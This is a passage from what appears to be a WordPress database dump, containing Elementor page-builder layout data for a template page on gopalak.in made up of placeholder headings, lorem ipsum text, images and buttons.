NEWS\",\"align\":\"center\",\"title_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"36bc667\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":740,\"sizes\":[]},\"structure\":\"40\"},\"elements\":[{\"id\":\"bb02c40\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"0769ef1\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\",\"id\":1354,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thumbnail\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"75ce5f9\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\",\"header_size\":\"p\",\"align\":\"center\",\"title_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"f527d10\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"center\",\"size\":\"xs\",\"background_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true},{\"id\":\"7899f3f\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"8274f01\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\",\"id\":1354,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thumbnail\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"0f6b27e\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\",\"header_size\":\"p\",\"align\":\"center\",\"title_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"e70a66d\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"center\",\"size\":\"xs\",\"background_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true},{\"id\":\"ae8a1a8\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"fd8def6\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\",\"id\":1354,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thumbnail\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"91ca2f8\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\",\"header_size\":\"p\",\"align\":\"center\",\"title_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"a36dcd9\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"center\",\"size\":\"xs\",\"background_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true},{\"id\":\"125f124\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"508fa7c\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\",\"id\":1354,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thumbnail\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"4ddf161\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\",\"header_size\":\"p\",\"align\":\"center\",\"title_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"36cae65\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"center\",\"size\":\"xs\",\"background_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false}]'),(7723,1385,'_elementor_page_assets','a:0:{}'),(7725,1386,'_elementor_edit_mode','builder'),(7726,1386,'_elementor_template_type','wp-page'),(7727,1386,'_elementor_version','3.7.6'),(7728,1386,'_wp_page_template','elementor_canvas'),(7729,1386,'_elementor_data','[{\"id\":\"3051cd6\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"49cbdad\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"2074e4d\",\"elType\":\"widget\",\"settings\":{\"anchor\":\"home\"},\"elements\":[],\"widgetType\":\"menu-anchor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7fab8ef\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"stretch_section\":\"section-stretched\",\"structure\":\"22\",\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/803471.jpg\",\"id\":1355,\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"initial\",\"background_ypos\":{\"unit\":\"px\",\"size\":-55,\"sizes\":[]},\"background_repeat\":\"no-repeat\",\"background_size\":\"cover\",\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"284\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"728be13\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":92.108999999999995},\"elements\":[{\"id\":\"0ea21e0\",\"elType\":\"widget\",\"settings\":{\"title\":\"Lorem Ipsum is simply dummy tex \",\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Saira Stencil One\",\"typography_font_size\":{\"unit\":\"px\",\"size\":22,\"sizes\":[]},\"typography_font_weight\":\"100\",\"text_stroke_text_stroke_type\":\"yes\",\"text_stroke_text_stroke\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"text_stroke_stroke_color\":\"#FFFFFF\",\"text_shadow_text_shadow_type\":\"yes\",\"text_shadow_text_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"color\":\"rgba(68.25, 44.95597826086957, 44.95597826086957, 0.3)\"},\"_margin\":{\"unit\":\"px\",\"top\":\"1\",\"right\":\"122\",\"bottom\":\"0\",\"left\":\"423\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"21726cb\",\"elType\":\"widget\",\"settings\":{\"editor\":\"\",\"align\":\"justify\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"3\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"98f9256\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":7.1929999999999996},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"5b7eb71\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":664,\"sizes\":[]},\"structure\":\"30\",\"margin\":{\"unit\":\"px\",\"top\":\"-62\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false}},\"elements\":[{\"id\":\"3e91b45\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"background_background\":\"gradient\",\"background_color\":\"#7EB087\",\"background_color_b\":\"#014C0B\",\"border_border\":\"solid\",\"border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"2\",\"bottom\":\"2\",\"left\":\"2\",\"isLinked\":true}},\"elements\":[{\"id\":\"1976daf\",\"elType\":\"widget\",\"settings\":{\"title_text\":\"This is the heading\",\"description_text\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, \",\"title_color\":\"#FFFFFF\",\"description_color\":\"#E9E9E9\"},\"elements\":[],\"widgetType\":\"image-box\"}],\"isInner\":false},{\"id\":\"e7e4c38\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"background_background\":\"gradient\",\"background_color\":\"#7EB087\",\"background_color_b\":\"#014C0B\",\"border_border\":\"solid\",\"border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"2\",\"bottom\":\"2\",\"left\":\"2\",\"isLinked\":true}},\"elements\":[{\"id\":\"3778299\",\"elType\":\"widget\",\"settings\":{\"title_text\":\"This is the heading\",\"description_text\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, \",\"title_color\":\"#FFFFFF\",\"description_color\":\"#E9E9E9\"},\"elements\":[],\"widgetType\":\"image-box\"}],\"isInner\":false},{\"id\":\"c923623\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"background_background\":\"gradient\",\"background_color\":\"#7EB087\",\"background_color_b\":\"#014C0B\",\"border_border\":\"solid\",\"border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"2\",\"bottom\":\"2\",\"left\":\"2\",\"isLinked\":true}},\"elements\":[{\"id\":\"916798d\",\"elType\":\"widget\",\"settings\":{\"title_text\":\"This is the heading\",\"description_text\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, \",\"title_color\":\"#FFFFFF\",\"description_color\":\"#E9E9E9\"},\"elements\":[],\"widgetType\":\"image-box\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f78ed1a\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"39b0f4e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"e9c825a\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":125,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"62f5f76\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#C2DEB9\"},\"elements\":[{\"id\":\"a2fa7af\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"ac4e1ad\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"caa5378\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\",\"align\":\"center\",\"title_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"39999ab\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Lorem Ipsum<\\/strong>\\u00a0is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry\'s standard dummy text ever since the 1500s, when an unknown printer took a galley of type and scrambled it to make a type specimen book. It has survived not only five centuries, but also the leap into electronic typesetting, remaining essentially unchanged. It was popularised in the 1960s with the release of Letraset sheets containing Lorem Ipsum passages, and more recently with desktop publishing software like Aldus PageMaker including versions of Lorem Ipsum.<\\/p>\",\"align\":\"center\",\"text_color\":\"#174725\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"30\",\"bottom\":\"0\",\"left\":\"30\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"eaa49a3\",\"elType\":\"widget\",\"settings\":{\"text\":\"Know More\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/shop\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"center\",\"background_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"c3a23a2\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"22d1461\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"5d24ace\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\",\"id\":1357,\"alt\":\"\",\"source\":\"library\"},\"background_repeat\":\"no-repeat\",\"background_size\":\"initial\",\"padding\":{\"unit\":\"px\",\"top\":\"00\",\"right\":\"100\",\"bottom\":\"750\",\"left\":\"100\",\"isLinked\":false}},\"elements\":[{\"id\":\"eb82b0e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"acb2826\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#C2DEB9\",\"margin\":{\"unit\":\"px\",\"top\":\"-458\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false}},\"elements\":[{\"id\":\"84a32d8\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"89a82b4\",\"elType\":\"widget\",\"settings\":{\"title\":\"LATEST NEWS\",\"align\":\"center\",\"title_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"36bc667\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":740,\"sizes\":[]},\"structure\":\"40\"},\"elements\":[{\"id\":\"bb02c40\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"0769ef1\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\",\"id\":1354,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thumbnail\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"75ce5f9\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\",\"header_size\":\"p\",\"align\":\"center\",\"title_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"f527d10\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"center\",\"size\":\"xs\",\"background_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true},{\"id\":\"7899f3f\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"8274f01\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\",\"id\":1354,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thumbnail\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"0f6b27e\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\",\"header_size\":\"p\",\"align\":\"center\",\"title_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"e70a66d\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"center\",\"size\":\"xs\",\"background_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true},{\"id\":\"ae8a1a8\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"fd8def6\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\",\"id\":1354,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thumbnail\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"91ca2f8\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\",\"header_size\":\"p\",\"align\":\"center\",\"title_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"a36dcd9\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"center\",\"size\":\"xs\",\"background_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true},{\"id\":\"125f124\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"508fa7c\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\",\"id\":1354,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thumbnail\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"4ddf161\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\",\"header_size\":\"p\",\"align\":\"center\",\"title_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"36cae65\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"center\",\"size\":\"xs\",\"background_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false}]'),(7730,1386,'_elementor_page_assets','a:0:{}'),(7733,1387,'_elementor_edit_mode','builder'),(7734,1387,'_elementor_template_type','wp-page'),(7735,1387,'_elementor_version','3.7.6'),(7736,1387,'_wp_page_template','elementor_canvas'),(7737,1387,'_elementor_data','[{\"id\":\"3051cd6\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"49cbdad\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"2074e4d\",\"elType\":\"widget\",\"settings\":{\"anchor\":\"home\"},\"elements\":[],\"widgetType\":\"menu-anchor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7fab8ef\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"stretch_section\":\"section-stretched\",\"structure\":\"22\",\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/803471.jpg\",\"id\":1355,\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"initial\",\"background_ypos\":{\"unit\":\"px\",\"size\":-55,\"sizes\":[]},\"background_repeat\":\"no-repeat\",\"background_size\":\"cover\",\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"284\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"728be13\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":92.108999999999995},\"elements\":[{\"id\":\"0ea21e0\",\"elType\":\"widget\",\"settings\":{\"title\":\"Lorem Ipsum is simply dummy tex \",\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Saira Stencil One\",\"typography_font_size\":{\"unit\":\"px\",\"size\":22,\"sizes\":[]},\"typography_font_weight\":\"100\",\"text_stroke_text_stroke_type\":\"yes\",\"text_stroke_text_stroke\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"text_stroke_stroke_color\":\"#FFFFFF\",\"text_shadow_text_shadow_type\":\"yes\",\"text_shadow_text_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"color\":\"rgba(68.25, 44.95597826086957, 44.95597826086957, 0.3)\"},\"_margin\":{\"unit\":\"px\",\"top\":\"1\",\"right\":\"122\",\"bottom\":\"0\",\"left\":\"423\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"21726cb\",\"elType\":\"widget\",\"settings\":{\"editor\":\"\",\"align\":\"justify\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"3\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"98f9256\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":7.1929999999999996},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"5b7eb71\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":664,\"sizes\":[]},\"structure\":\"30\",\"margin\":{\"unit\":\"px\",\"top\":\"-62\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false}},\"elements\":[{\"id\":\"3e91b45\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"background_background\":\"gradient\",\"background_color\":\"#7EB087\",\"background_color_b\":\"#014C0B\",\"border_border\":\"solid\",\"border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"2\",\"bottom\":\"2\",\"left\":\"2\",\"isLinked\":true}},\"elements\":[{\"id\":\"1976daf\",\"elType\":\"widget\",\"settings\":{\"title_text\":\"This is the heading\",\"description_text\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, \",\"title_color\":\"#FFFFFF\",\"description_color\":\"#E9E9E9\"},\"elements\":[],\"widgetType\":\"image-box\"}],\"isInner\":false},{\"id\":\"e7e4c38\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"background_background\":\"gradient\",\"background_color\":\"#7EB087\",\"background_color_b\":\"#014C0B\",\"border_border\":\"solid\",\"border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"2\",\"bottom\":\"2\",\"left\":\"2\",\"isLinked\":true}},\"elements\":[{\"id\":\"3778299\",\"elType\":\"widget\",\"settings\":{\"title_text\":\"This is the heading\",\"description_text\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, \",\"title_color\":\"#FFFFFF\",\"description_color\":\"#E9E9E9\"},\"elements\":[],\"widgetType\":\"image-box\"}],\"isInner\":false},{\"id\":\"c923623\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"background_background\":\"gradient\",\"background_color\":\"#7EB087\",\"background_color_b\":\"#014C0B\",\"border_border\":\"solid\",\"border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"2\",\"bottom\":\"2\",\"left\":\"2\",\"isLinked\":true}},\"elements\":[{\"id\":\"916798d\",\"elType\":\"widget\",\"settings\":{\"title_text\":\"This is the heading\",\"description_text\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, \",\"title_color\":\"#FFFFFF\",\"description_color\":\"#E9E9E9\"},\"elements\":[],\"widgetType\":\"image-box\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f78ed1a\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"39b0f4e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"e9c825a\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":125,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"62f5f76\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#C2DEB9\"},\"elements\":[{\"id\":\"a2fa7af\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"ac4e1ad\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"caa5378\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\",\"align\":\"center\",\"title_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"39999ab\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Lorem Ipsum<\\/strong>\\u00a0is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry\'s standard dummy text ever since the 1500s, when an unknown printer took a galley of type and scrambled it to make a type specimen book. It has survived not only five centuries, but also the leap into electronic typesetting, remaining essentially unchanged. It was popularised in the 1960s with the release of Letraset sheets containing Lorem Ipsum passages, and more recently with desktop publishing software like Aldus PageMaker including versions of Lorem Ipsum.<\\/p>\",\"align\":\"center\",\"text_color\":\"#174725\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"30\",\"bottom\":\"0\",\"left\":\"30\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"eaa49a3\",\"elType\":\"widget\",\"settings\":{\"text\":\"Know More\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/shop\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"center\",\"background_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"c3a23a2\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"22d1461\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"5d24ace\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\",\"id\":1357,\"alt\":\"\",\"source\":\"library\"},\"background_repeat\":\"no-repeat\",\"background_size\":\"initial\",\"padding\":{\"unit\":\"px\",\"top\":\"00\",\"right\":\"100\",\"bottom\":\"750\",\"left\":\"100\",\"isLinked\":false}},\"elements\":[{\"id\":\"eb82b0e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"acb2826\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#C2DEB9\",\"margin\":{\"unit\":\"px\",\"top\":\"-458\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false}},\"elements\":[{\"id\":\"84a32d8\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"89a82b4\",\"elType\":\"widget\",\"settings\":{\"title\":\"LATEST NEWS\",\"align\":\"center\",\"title_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"36bc667\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":740,\"sizes\":[]},\"structure\":\"40\"},\"elements\":[{\"id\":\"bb02c40\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"0769ef1\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\",\"id\":1354,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thumbnail\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"75ce5f9\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\",\"header_size\":\"p\",\"align\":\"center\",\"title_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"f527d10\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"center\",\"size\":\"xs\",\"background_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true},{\"id\":\"7899f3f\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"8274f01\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\",\"id\":1354,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thumbnail\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"0f6b27e\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\",\"header_size\":\"p\",\"align\":\"center\",\"title_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"e70a66d\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"center\",\"size\":\"xs\",\"background_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true},{\"id\":\"ae8a1a8\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"fd8def6\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\",\"id\":1354,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thumbnail\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"91ca2f8\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\",\"header_size\":\"p\",\"align\":\"center\",\"title_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"a36dcd9\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"center\",\"size\":\"xs\",\"background_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true},{\"id\":\"125f124\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"508fa7c\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\",\"id\":1354,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thumbnail\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"4ddf161\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\",\"header_size\":\"p\",\"align\":\"center\",\"title_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"36cae65\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click 